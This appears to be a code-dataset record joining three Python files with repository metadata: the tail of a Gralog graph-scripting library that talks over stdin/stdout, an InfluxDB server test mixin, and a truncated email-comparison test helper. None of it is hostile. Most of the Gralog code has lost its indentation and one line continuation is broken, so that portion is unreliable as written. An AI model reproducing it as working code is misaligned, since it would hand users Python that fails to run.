e = self.getEdgeOrNew(-2)
e.setSource(v1)
e.setTarget(v2)
def vertexifyTGFCommand(self, line):
line = line.strip()
        vString = line.split(" ")[0]
        v = self.getVertexOrNew(int(vString))
        self.id_to_vertex[v.getId()] = v
def edgifyGTGFCommand(self, line):
line = line.strip()
endpoints = line.split(" ")
v1String = endpoints[0]
v1 = self.getVertexOrNew(int(v1String))
v2String = endpoints[1]
v2 = self.getVertexOrNew(int(v2String))
eid = int(endpoints[2])
e = self.getEdgeOrNew(eid)
e.setSource(v1)
e.setTarget(v2)
self.id_to_edge[eid] = e
def vertexifyGTGFCommand(self, line):
self.vertexifyTGFCommand(line)
def getEdgeIdByEndpoints(self, endpoints):
line = "getEdgeIdByEndpoints#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(endpoints)
print(line.rstrip())
sys.stdout.flush()
edgeId = sys.stdin.readline().rstrip()
return edgeId
def getVertex(self, vertex):
line = "getVertex#"+str(self.id).rstrip() + "#"
line = line + str(vertex).rstrip()
        print(line.rstrip())
sys.stdout.flush()
vertexTuple = sys.stdin.readline().rstrip()
vertex.sourceProperties(vertexTuple)
return vertex
def getEdge(self, edge):
line = "getEdge#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
        print(line.rstrip())
sys.stdout.flush()
edgeTuple = sys.stdin.readline().rstrip()
edge.sourceProperties(edgeTuple)
return edge
# end helper functions
# Graph Manipulating Functions
def addVertex(self, vertexId=-1, pos=(None, None)):
# return: Vertex object with id
line = "addVertex#" + str(self.id).rstrip()
x = -1
y = -1
vertexIdSwap = False
if type(vertexId) == tuple and pos == (None, None):
x = vertexId[0]
y = vertexId[1]
vertexId = -1
else:
x = pos[0]
y = pos[1]
if vertexId != -1:
line += "#"+str(vertexId).rstrip()
if x != None and y != None:
line += "#" + str(x).rstrip() + "#" + str(y).rstrip()
print(line)
sys.stdout.flush()
vid = sys.stdin.readline()
v = Vertex(self, vid)
self.id_to_vertex[v.getId()] = v
return v
def deleteVertex(self, v):
edges = self.getIncidentEdges(v)
for e in edges:
del self.id_to_edge[e.getId()]
v = vertexId(v)
del self.id_to_vertex[v]
print("deleteVertex#" + str(self.id).rstrip() + "#" + str(v))
sys.stdout.flush()
def addEdge(self, sourceVertex, targetVertex, edgeId = -1):
# return: Edge object with id only
sourceVertex = vertexId(sourceVertex)
targetVertex = vertexId(targetVertex)
idSubString = ""
if not edgeId == -1:
idSubString = "#"+str(edgeId)
line = "addEdge#"+str(self.id).rstrip() + "#" + str(sourceVertex).rstrip() + \
"#" + str(targetVertex).rstrip() + idSubString.rstrip()
print(line.rstrip())
sys.stdout.flush()
eid = sys.stdin.readline()
if eid != "\n": # it's possible that the edge cannot be added (e.g., a new selfloop)
e = Edge(self, eid)
self.id_to_edge[e.getId()] = e
return e
return None
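    # Construction sketch (kept as a comment since this module is a library and
    # code here would run on import): building a triangle with the calls above,
    # assuming a Gralog session is attached to stdin/stdout.
    #
    #   g = Graph("Undirected Graph")
    #   a, b, c = g.addVertex(), g.addVertex(), g.addVertex()
    #   g.addEdge(a, b); g.addEdge(b, c); g.addEdge(c, a)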
def existsEdge(self, edge):
line = "existsEdge#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
print(line.rstrip())
sys.stdout.flush()
thereExistsAnEdge = sys.stdin.readline().rstrip()
return thereExistsAnEdge.lower() == "true"
def existsVertex(self, vertex):
line = "existsVertex#"+str(self.id).rstrip() + "#"
line = line + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
thereExistsAVertex = sys.stdin.readline().rstrip()
return thereExistsAVertex.lower() == "true"
def deleteEdge(self, edge):
        del self.id_to_edge[edgeId(edge)]  # accept either an Edge object or a bare id
line = "deleteEdge#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
print(line.rstrip())
sys.stdout.flush()
def getAllEdgesBetween(self, vertexPair):
line = "getAllEdgesBetween#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(vertexPair)
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
    # creates a random Erdos-Renyi graph with n vertices and edge probability p
def generateRandomGraph(self, vertexCount, p):
if not isinstance(vertexCount, int):
gPrint("Cannot generate a random graph, wrong parameter: \
vertex number must be an int.")
if vertexCount < 0:
gPrint("Cannot generate a random graph, wrong parameter: \
vertex number cannot be less than 0.")
if not isinstance(p, float) or p < 0 or p > 1.0:
gPrint("Cannot generate a random graph, wrong parameter: \
probability of an edge must be a float in [0,1].")
if vertexCount == 0:
return
vertices = []
coordinates = dict()
for id in range(vertexCount):
coordinates[id] = (10*math.cos(2*id*math.pi/vertexCount),
10*math.sin(2*id*math.pi/vertexCount))
nxgraph = nx.fast_gnp_random_graph(vertexCount, p)
d = dict()
id = 0
for nxV in nxgraph.nodes():
d[id] = nxV
id += 1
nxEdges = nxgraph.edges()
id = 0
for x in range(vertexCount):
vertices.append(self.addVertex(id, coordinates[id]))
id += 1
for x in vertices:
for y in vertices:
if x.getId() < y.getId():
if (d[x.getId()], d[y.getId()]) in nxEdges:
x.connect(y)
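    # e.g. g.generateRandomGraph(10, 0.3) lays 10 vertices out on a circle and,
    # via networkx's fast_gnp_random_graph, connects each pair independently
    # with probability 0.3.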
    # end manipulative functions
# setter functions
# begin: best for private use!
def setVertexFillColor(self, vertex, colorHex=-1, colorRGB=-1):
vertex = vertexId(vertex)
line = "setVertexFillColor#" + str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#"
if not (colorHex == -1):
line = line + hexFormatter(str(colorHex))
elif not (colorRGB == -1):
try:
line = line + rgbFormatter(colorRGB)
except:
self.sendErrorToGralog("the rgb color: " + str(colorRGB).rstrip() + " is not properly formatted!")
else:
self.sendErrorToGralog("neither Hex nor RGB color specified!")
print(line.rstrip())
sys.stdout.flush()
def setVertexStrokeColor(self, vertex, colorHex=-1, colorRGB=-1):
vertex = vertexId(vertex)
# print("colorhex: " + str(colorHex))
line = "setVertexStrokeColor#"+str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#"
if not (colorHex == -1):
line = line + hexFormatter(str(colorHex))
elif not (colorRGB == -1) and len(colorRGB) == 3:
line = line + rgbFormatter(colorRGB)
print(line.rstrip())
sys.stdout.flush()
def setVertexCoordinates(self, vertex, coordinates):
line = "setVertexCoordinates#" + str(self.id).rstrip()+"#" + str(vertexId(vertex)).rstrip()
x = -1
y = -1
x = coordinates[0]
y = coordinates[1]
if x == None:
x = "empty"
if y == None:
y = "empty"
line += "#" + str(x).rstrip() + "#" + str(y).rstrip()
print(line)
sys.stdout.flush()
def setEdgeContour(self, edge, contour):
line = line = "setEdgeContour#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#" + str(contour).rstrip()
print(line)
sys.stdout.flush()
def setEdgeColor(self, edge, colorHex=-1, colorRGB=-1):
line = "setEdgeColor#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#"
if not (colorHex == -1):
line = line + hexFormatter(colorHex)
elif not (colorRGB == -1) and len(colorRGB) == 3:
line = line + rgbFormatter(colorRGB)
print(line.rstrip())
sys.stdout.flush()
def setVertexRadius(self, vertex, newRadius):
self.setVertexDimension(vertex, newRadius, "radius")
def setVertexHeight(self, vertex, newHeight):
self.setVertexDimension(vertex, newHeight, "height")
def setVertexWidth(self, vertex, newWidth):
self.setVertexDimension(vertex, newWidth, "width")
def setVertexDimension(self, vertex, newDimension, dimension):
vertex = vertexId(vertex)
line = "setVertexDimension#"+str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" + str(newDimension).rstrip()+"#" + dimension.rstrip()
print(line.rstrip())
sys.stdout.flush()
def setVertexShape(self, vertex, shape):
vertex = vertexId(vertex)
line = "setVertexShape#" + str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" + str(shape).rstrip()
print(line.rstrip())
sys.stdout.flush()
def setEdgeWeight(self, edge, weight):
self.setEdgeProperty(edge, "weight", weight)
def setEdgeThickness(self, edge, thickness):
self.setEdgeProperty(edge, "thickness", thickness)
def setEdgeProperty(self, edge, propertyName, value):
line = "setEdgeProperty#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#" + propertyName.rstrip().lower() + "#" + str(value).rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
def setVertexProperty(self, vertex, propertyName, value):
line = "setVertexProperty#"+str(self.id).rstrip() + "#"
line = line + str(vertexId(vertex)).rstrip()
line = line + "#" + propertyName.rstrip().lower() + "#" + str(value).rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
def setEdgeLabel(self, edge, label):
line = "setEdgeLabel#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#" + label
print(line.rstrip())
sys.stdout.flush()
def setVertexLabel(self, vertex, label):
vertex = vertexId(vertex)
line = "setVertexLabel#" + str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" + label
print(line.rstrip())
sys.stdout.flush()
# end: best for private use!
def setGraph(self, graphFormat, graphString = "hello_world"):
graphFormat = graphFormat.lower()
line = "setGraph#"+str(self.id).rstrip() + "#" + graphFormat.rstrip()+"#"
if graphFormat == "gtgf" or graphFormat == "tgf":
line += "$$\n"
line += graphString
if graphFormat == "gtgf" or graphFormat == "tgf":
line += "$\n"
print(line)
sys.stdout.flush()
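    # Sketch: pushing a small graph into Gralog in TGF form (vertex lines, a
    # "#" separator line, then edge lines); the payload below is illustrative.
    #
    #   g.setGraph("tgf", "1\n2\n#\n1 2\n")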
# TODO: implement this
# end setter functions
# getter functions
def toIgraph(self):
grlgML_file = open("tmp.graphml", "w")
grlgML_file.write(self.toXml())
grlgML_file.close()
g_ig = ig.Graph.Read_GraphML("tmp.graphml")
os.remove("tmp.graphml")
return g_ig
def toNx(self):
grlgML_file = open("tmp.graphml", "w")
grlgML_file.write(self.toXml())
grlgML_file.close()
g_nx = nx.read_graphml("tmp.graphml")
os.remove("tmp.graphml")
return g_nx
def toElementTree(self):
grlgML_file = open("tmp.graphml", "w")
grlgML_file.write(self.toXml())
grlgML_file.close()
g_ET = ET.parse("tmp.graphml")
os.remove("tmp.graphml")
return g_ET
def toXml(self):
return self.getGraph("xml")
def getGraph(self, graphFormat):
        # Warning: importing as pure TGF means edge ids will
        # be lost, which results in errors on the Gralog side.
line = "getGraph#"+str(self.id).rstrip() + "#" + graphFormat.rstrip()
print(line.rstrip())
i = 0
sys.stdout.flush()
line = sys.stdin.readline()
graphString = ""
if graphFormat.lower() == "tgf" or graphFormat.lower() == "gtgf":
tgf = graphFormat.lower() == "tgf"
multiline = False
first = False
if line[0] == line[1] == '$':
multiline = True
if tgf:
first = True
line = sys.stdin.readline()
hashtagSeen = False
if not multiline:
return graphString
while line[0] != '$':
# gPrint("line: " + line +" and line[0]: " + line[0] + " and line[0]!='$': " + str(line[0] != '$'))
graphString += line
if line[0] == '#':
hashtagSeen = True
else:
if not first:
if hashtagSeen:
if tgf:
self.edgifyTGFCommand(line)
else:
self.edgifyGTGFCommand(line)
else:
if tgf:
self.vertexifyTGFCommand(line)
else:
self.vertexifyGTGFCommand(line)
line = sys.stdin.readline()
i += 1
first = False
return graphString
if graphFormat.lower() == "xml":
return line
def getAllVertices(self):
# return: list of Vertex objects with id
line = "getAllVertices#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
vertexIdStringList = (sys.stdin.readline()).split("#")
vertexList = []
for vertexIdString in vertexIdStringList:
if representsInt(vertexIdString):
v = self.getVertexOrNew(vertexIdString)
vertexList.append(v)
return vertexList
def getVertices(self):
        return self.getAllVertices()
def getAllEdges(self):
# return: list of fully sourced Edge objects with fully sourced endpoint Vertices
line = "getAllEdges#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
if len(endpointList) == 1 and endpointList[-1] == "\n":
endpointList = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
            if e is not None:
edges.append(e)
return edges
def getEdges(self):
        return self.getAllEdges()
# start: best for private use!
def getNeighbours(self, vertex):
# return: list of Vertex objects with id
vertex = vertexId(vertex)
line = "getNeighbours#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
neighbourIdStringList = (sys.stdin.readline()).split("#")
neighboursList = []
for neighbourIdString in neighbourIdStringList:
if representsInt(neighbourIdString):
v = self.getVertexOrNew(neighbourIdString)
neighboursList.append(v)
return neighboursList
def getOutgoingNeighbours(self, vertex):
# return: list of Vertex objects with id
vertex = vertexId(vertex)
line = "getOutgoingNeighbours#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
outgoingNeighbourIdStringList = (sys.stdin.readline()).split("#")
outgoingNeighboursList = []
for outgoingNeighbourIdString in outgoingNeighbourIdStringList:
if representsInt(outgoingNeighbourIdString):
v = self.getVertexOrNew(outgoingNeighbourIdString)
outgoingNeighboursList.append(v)
return outgoingNeighboursList
def getIncomingNeighbours(self, vertex):
# return: list of Vertex objects with id
vertex = vertexId(vertex)
line = "getIncomingNeighbours#"+str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
incomingNeighbourIdStringList = (sys.stdin.readline()).split("#")
incomingNeighboursList = []
for incomingNeighbourIdString in incomingNeighbourIdStringList:
if representsInt(incomingNeighbourIdString):
v = self.getVertexOrNew(incomingNeighbourIdString)
incomingNeighboursList.append(v)
return incomingNeighboursList
def getIncidentEdges(self, vertex):
# return: list of Edge objects with id's only
vertex = vertexId(vertex)
line = "getIncidentEdges#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
            if e is not None:
edges.append(e)
return edges
def getAdjacentEdges(self, edge):
# return: list of Edge objects with id's only
line = "getAdjacentEdges#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
            if e is not None:
edges.append(e)
return edges
def getOutgoingEdges(self, vertex):
# return: list of Edge objects with id's only
vertex = vertexId(vertex)
line = "getOutgoingEdges#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
            if e is not None:
edges.append(e)
return edges
def getIncomingEdges(self, vertex):
# return: list of Edge objects with id's only
vertex = vertexId(vertex)
line = "getIncomingEdges#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
            if e is not None:
edges.append(e)
return edges
def getEdgeWeight(self, edge):
return self.getEdgeProperty(edge, "weight")
def getEdgeLabel(self, edge):
return self.getEdgeProperty(edge, "label")
def getEdgeProperty(self, edge, prop):
# internally: fill edge property dictionary
# return: String representing queried property
line = "getEdgeProperty#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#" + prop.rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
edgeTuple = sys.stdin.readline().rstrip()
edge.sourceProperties(edgeTuple)
return edge.getProperty(prop)
def getVertexProperty(self, vertex, prop):
# internally: fill edge property dictionary
# return: String representing queried property
vid = vertexId(vertex)
line = "getVertexProperty#"+str(self.id).rstrip() + "#"
line = line + vid
line = line + "#" + prop.rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
vertexTuple = sys.stdin.readline().rstrip()
vertex.sourceProperties(vertexTuple)
return vertex.getProperty(prop)
# end: best use privately!
def requestVertex(self):
line = "requestVertex#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
vid = sys.stdin.readline().rstrip()
vertex = self.getVertexOrNew(vid)
return vertex
def requestRandomVertex(self):
line = "requestRandomVertex#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
vid = sys.stdin.readline().rstrip()
vertex = self.getVertexOrNew(vid)
return vertex
def requestEdge(self):
line = "requestEdge#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
vid = sys.stdin.readline().rstrip()
edge = self.getEdgeOrNew(vid)
return edge
def requestRandomEdge(self):
line = "requestRandomEdge#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
eid = sys.stdin.readline().rstrip()
edge = self.getEdgeOrNew(eid)
return edge
def requestInteger(self):
line = "requestInteger#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
i = sys.stdin.readline().rstrip()
return int(i)
def requestFloat(self):
line = "requestFloat#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
d = sys.stdin.readline().rstrip()
return float(d)
def requestString(self):
line = "requestString#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
st = sys.stdin.readline().rstrip()
return str(st)
# runtime changer functions
def pauseUntilSpacePressed(self, *args):
line = "pauseUntilSpacePressed"
rank = None
        try:
            rank = int(args[0])
        except (IndexError, ValueError, TypeError):
            pass
        if len(args) > 0 and rank is not None:
            rank = int(args[0])
            args = args[1:]
        argString = ""
        if rank is not None:
            argString += "#"+str(rank).rstrip()
for key in sorted(self.variablesToTrack.keys()):
term = "#("+str(key).rstrip()+"=" + \ str(self.variablesToTrack[key]).rstrip()+")"
argString = argString + term.rstrip()
for x in args:
if len(x) != 2:
argString = "#(syntax=pauseUntilSpacePressed((key, val)))"
break
            if isinstance(x, list):
for each in x:
term = "#("+"arrayyyy"+str(each[0])+"="+str(each[1])+")"
argString = argString + term
else:
term = "#("+str(x[0])+"="+str(x[1])+")"
argString = argString + term.rstrip()
line = line + argString
print(line)
sys.stdout.flush()
toSkip = sys.stdin.readline()
def track(self, name, var):
# ideally, something like this:
self.variablesToTrack[name] = var # if this is a pointer, it will work
# if it is an int or str, or some other non-reference type, it will not
def unTrack(self, name):
del self.variablesToTrack[name]
def sendMessage(self, toSend):
print(toSend)
sys.stdout.flush()
def message(self, message):
print("message#"+str(self.id).rstrip() + "#"+str(message).rstrip())
sys.stdout.flush()
def sendErrorToGralog(self, toSend):
print("error#"+str(self.id).rstrip() + "#"+str(toSend).rstrip())
sys.stdout.flush()
exit()
def mistakeLine(self):
print("wubbadubdub 3 men in a tub")
sys.stdout.flush()
sys.stdin.readline()
def pause(self, *args):
self.pauseUntilSpacePressed(*args)
# end runtime changer functions
def __str__(self):
vertices = [str(v) for v in self.id_to_vertex]
vertices.sort()
edges = [str(e) for e in self.getEdges()]
edges.sort()
return "VERTICES: " + " ".join(vertices) + "\nEDGES: " + " ".join(edges)
def gPrint(message):
if not message: # empty: print nothing except the new line (hacked with \t; <space> doesn't work)
print("gPrint#-1#" + "\t")
sys.stdout.flush()
else:
message = str(message)
lines = message.split('\n')
for line in lines:
print("gPrint#-1#" + line)
sys.stdout.flush()
def representsInt(s):
try:
int(s)
return True
except ValueError:
return False
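# Usage sketch (illustrative only, not part of the original module): every
# method above frames a request as a "#"-separated line on stdout and, where
# needed, reads the reply from stdin, so a Gralog instance must be listening
# on the other end. Assuming a Graph object `g` obtained through this module:
#
#   v = g.requestRandomVertex()          # asks Gralog for a vertex id
#   g.setVertexLabel(v, "start")         # emits setVertexLabel#<graph>#<vertex>#start
#   for n in g.getNeighbours(v):         # round-trips a getNeighbours request
#       g.setVertexShape(n, "ellipse")   # "ellipse" is an assumed shape name
#   g.pause(("picked", v))               # blocks until space is pressed in Gralog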
| [] |
ocworld/influxdb-python | influxdb/tests/server_tests/base.py | a6bfe3e4643fdc775c97e1c4f457bc35d86e631e | # -*- coding: utf-8 -*-
"""Define the base module for server test."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import sys
from influxdb.tests import using_pypy
from influxdb.tests.server_tests.influxdb_instance import InfluxDbInstance
from influxdb.client import InfluxDBClient
if not using_pypy:
from influxdb.dataframe_client import DataFrameClient
def _setup_influxdb_server(inst):
inst.influxd_inst = InfluxDbInstance(
inst.influxdb_template_conf,
udp_enabled=getattr(inst, 'influxdb_udp_enabled', False),
)
inst.cli = InfluxDBClient('localhost',
inst.influxd_inst.http_port,
'root',
'',
database='db')
if not using_pypy:
inst.cliDF = DataFrameClient('localhost',
inst.influxd_inst.http_port,
'root',
'',
database='db')
def _teardown_influxdb_server(inst):
remove_tree = sys.exc_info() == (None, None, None)
inst.influxd_inst.close(remove_tree=remove_tree)
class SingleTestCaseWithServerMixin(object):
"""Define the single testcase with server mixin.
A mixin for unittest.TestCase to start an influxdb server instance
in a temporary directory **for each test function/case**
"""
# 'influxdb_template_conf' attribute must be set
# on the TestCase class or instance.
@classmethod
def setUp(cls):
"""Set up an instance of the SingleTestCaseWithServerMixin."""
_setup_influxdb_server(cls)
@classmethod
def tearDown(cls):
"""Tear down an instance of the SingleTestCaseWithServerMixin."""
_teardown_influxdb_server(cls)
class ManyTestCasesWithServerMixin(object):
"""Define the many testcase with server mixin.
Same as the SingleTestCaseWithServerMixin but this module creates
a single instance for the whole class. Also pre-creates a fresh
database: 'db'.
"""
# 'influxdb_template_conf' attribute must be set on the class itself !
@classmethod
def setUpClass(cls):
"""Set up an instance of the ManyTestCasesWithServerMixin."""
_setup_influxdb_server(cls)
def setUp(self):
"""Set up an instance of the ManyTestCasesWithServerMixin."""
self.cli.create_database('db')
@classmethod
def tearDownClass(cls):
"""Deconstruct an instance of ManyTestCasesWithServerMixin."""
_teardown_influxdb_server(cls)
def tearDown(self):
"""Deconstruct an instance of ManyTestCasesWithServerMixin."""
self.cli.drop_database('db')
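# Usage sketch (illustrative, not part of the original module): a concrete test
# case built on the mixin above. The template path is a placeholder assumption
# and must point at a real influxd config template on the test machine.
#
# import unittest
#
# class ExampleServerTestCase(ManyTestCasesWithServerMixin, unittest.TestCase):
#     influxdb_template_conf = '/path/to/influxdb.conf.template'
#
#     def test_write_then_query(self):
#         self.cli.write_points(
#             [{'measurement': 'cpu', 'fields': {'value': 0.5}}])
#         result = self.cli.query('SELECT * FROM cpu')
#         assert list(result.get_points())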
| [((26, 15, 30, 44), 'influxdb.client.InfluxDBClient', 'InfluxDBClient', (), '', False, 'from influxdb.client import InfluxDBClient\n'), ((32, 21, 36, 51), 'influxdb.dataframe_client.DataFrameClient', 'DataFrameClient', (), '', False, 'from influxdb.dataframe_client import DataFrameClient\n'), ((40, 18, 40, 32), 'sys.exc_info', 'sys.exc_info', ({}, {}), '()', False, 'import sys\n')] |
cadithealth/genemail | genemail/testing.py | d906ad9deec70a6b19b66c244044d4466df2371a | # -*- coding: utf-8 -*-
#------------------------------------------------------------------------------
# file: $Id$
# auth: Philip J Grabner <[email protected]>
# date: 2013/10/21
# copy: (C) Copyright 2013 Cadit Health Inc., All Rights Reserved.
#------------------------------------------------------------------------------
# todo: this could be smarter... for example, it could:
# - detect when references resolve to the same content, but
# by different Content-IDs
# - detect when multipart sections could collapse to the same
# semantic structure
from __future__ import absolute_import
import unittest, email
from .util import smtpHeaderFormat
#------------------------------------------------------------------------------
def canonicalHeaders(message, ignore=None):
'''
Returns a canonical string representation of the `message` headers,
with the following changes made:
* The MIME boundary specified in the "Content-Type" header, if
specified, removed.
* Any headers listed in `ignore` are removed.
:Parameters:
ignore : list(str), optional, default: ['Content-Transfer-Encoding']
List of headers that should not be included in the canonical
form.
'''
if ignore is None:
ignore = ['Content-Transfer-Encoding']
ignore = [key.lower() for key in ignore]
hdrs = {key.lower(): '; '.join(sorted(message.get_all(key)))
for key in message.keys()
if key.lower() not in ignore}
hdrs['content-type'] = '; '.join(['='.join(filter(None, pair))
for pair in message.get_params()
if pair[0].lower() != 'boundary'])
return '\n'.join([
smtpHeaderFormat(key) + ': ' + hdrs[key]
for key in sorted(hdrs.keys())]) + '\n'
#------------------------------------------------------------------------------
def canonicalStructure(message):
ret = message.get_content_type() + '\n'
if not message.is_multipart():
return ret
msgs = message.get_payload()
for idx, msg in enumerate(msgs):
last = idx + 1 >= len(msgs)
indent = '\n|-- ' if not last else '\n '
ret += '|-- ' if not last else '`-- '
ret += indent.join(canonicalStructure(msg)[:-1].split('\n')) + '\n'
return ret
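# For example (a sketch, assuming a plain two-part multipart/alternative
# message), canonicalStructure would render:
#
#   multipart/alternative
#   |-- text/plain
#   `-- text/html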
#------------------------------------------------------------------------------
def makemsg(msg, submsg):
if msg is None:
return submsg
return msg + ' (' + submsg + ')'
#------------------------------------------------------------------------------
class EmailTestMixin(object):
mime_cmp_factories = {
'text/html' : lambda self, ct: self.try_assertXmlEqual,
'text/xml' : lambda self, ct: self.try_assertXmlEqual,
'text/*' : lambda self, ct: self.assertMultiLineEqual,
'*/*' : lambda self, ct: self.assertEqual,
}
#----------------------------------------------------------------------------
def registerMimeComparator(self, mimetype, comparator):
def factory(self, ct):
return comparator
self.mime_cmp_factories = dict(EmailTestMixin.mime_cmp_factories)
self.mime_cmp_factories[mimetype] = factory
#----------------------------------------------------------------------------
def _parseEmail(self, eml):
return email.message_from_string(eml)
#----------------------------------------------------------------------------
def assertEmailHeadersEqual(self, eml1, eml2, msg=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailHeadersEqual(eml1, eml2, msg=msg)
#----------------------------------------------------------------------------
def assertNotEmailHeadersEqual(self, eml1, eml2, msg=None):
try:
self.assertEmailHeadersEqual(eml1, eml2, msg=msg)
self.fail(msg or 'email headers %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def assertEmailStructureEqual(self, eml1, eml2, msg=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailStructureEqual(eml1, eml2, msg=msg)
#----------------------------------------------------------------------------
def assertNotEmailStructureEqual(self, eml1, eml2, msg=None):
try:
self.assertEmailStructureEqual(eml1, eml2, msg=msg)
self.fail(msg or 'email structure %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def assertEmailContentEqual(self, eml1, eml2, msg=None, mime_cmp_factories=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailContentEqual(eml1, eml2, msg=msg, mcf=mime_cmp_factories)
#----------------------------------------------------------------------------
def assertNotEmailContentEqual(self, eml1, eml2, msg=None):
try:
self.assertEmailContentEqual(eml1, eml2, msg=msg)
self.fail(msg or 'email content %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def assertEmailEqual(self, eml1, eml2, msg=None, mime_cmp_factories=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailHeadersEqual(eml1, eml2, msg=msg)
self._assertEmailStructureEqual(eml1, eml2, msg=msg)
self._assertEmailContentEqual(eml1, eml2, msg=msg, mcf=mime_cmp_factories)
#----------------------------------------------------------------------------
def assertNotEmailEqual(self, eml1, eml2, msg=None, mime_cmp_factories=None):
try:
self.assertEmailEqual(eml1, eml2, msg=msg, mime_cmp_factories=mime_cmp_factories)
self.fail(msg or 'email %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def _assertEmailHeadersEqual(self, msg1, msg2, msg=None):
hdr1 = 'EMAIL HEADERS:\n' + canonicalHeaders(msg1)
hdr2 = 'EMAIL HEADERS:\n' + canonicalHeaders(msg2)
self.assertMultiLineEqual(hdr1, hdr2, msg=msg)
#----------------------------------------------------------------------------
def _assertEmailStructureEqual(self, msg1, msg2, msg=None):
str1 = 'EMAIL STRUCTURE:\n' + canonicalStructure(msg1)
str2 = 'EMAIL STRUCTURE:\n' + canonicalStructure(msg2)
self.assertMultiLineEqual(str1, str2, msg=msg)
#----------------------------------------------------------------------------
def _assertEmailContentEqual(self, msg1, msg2, msg=None, mcf=None, context=None):
if context is None:
context = 'component root'
self.assertEqual(
msg1.is_multipart(), msg2.is_multipart(),
msg=makemsg(msg, context + ' is not multipart similar'))
self.assertEqual(
msg1.get_content_type(), msg2.get_content_type(),
msg=makemsg(msg, context + ' has content-type mismatch'))
if context == 'component root':
context = 'component ' + msg1.get_content_type()
if not msg1.is_multipart():
return self._assertEmailPayloadEqual(
msg1, msg2, msg=msg, mcf=mcf, context=context)
msgs1 = msg1.get_payload()
msgs2 = msg2.get_payload()
self.assertEqual(
len(msgs1), len(msgs2),
msg=makemsg(msg, context + ' has sub-message count mismatch'))
for idx, submsg in enumerate(msgs1):
sctxt = context + '[' + str(idx) + '] > ' + submsg.get_content_type()
self._assertEmailContentEqual(
submsg, msgs2[idx], msg=msg, mcf=mcf, context=sctxt)
#----------------------------------------------------------------------------
def _assertEmailPayloadEqual(self, msg1, msg2, msg=None, mcf=None, context='message'):
# paranoia...
self.assertFalse(msg1.is_multipart() or msg2.is_multipart())
self.assertEqual(msg1.get_content_type(), msg2.get_content_type())
# /paranoia...
dat1 = msg1.get_payload(decode=True)
dat2 = msg2.get_payload(decode=True)
def getcmp(msg, mcf):
ret = mcf.get(msg.get_content_type())
if ret is None:
ret = mcf.get(msg.get_content_maintype() + '/*')
if ret is None:
ret = mcf.get('*/*')
return ret
pcmp = None
if mcf is not None:
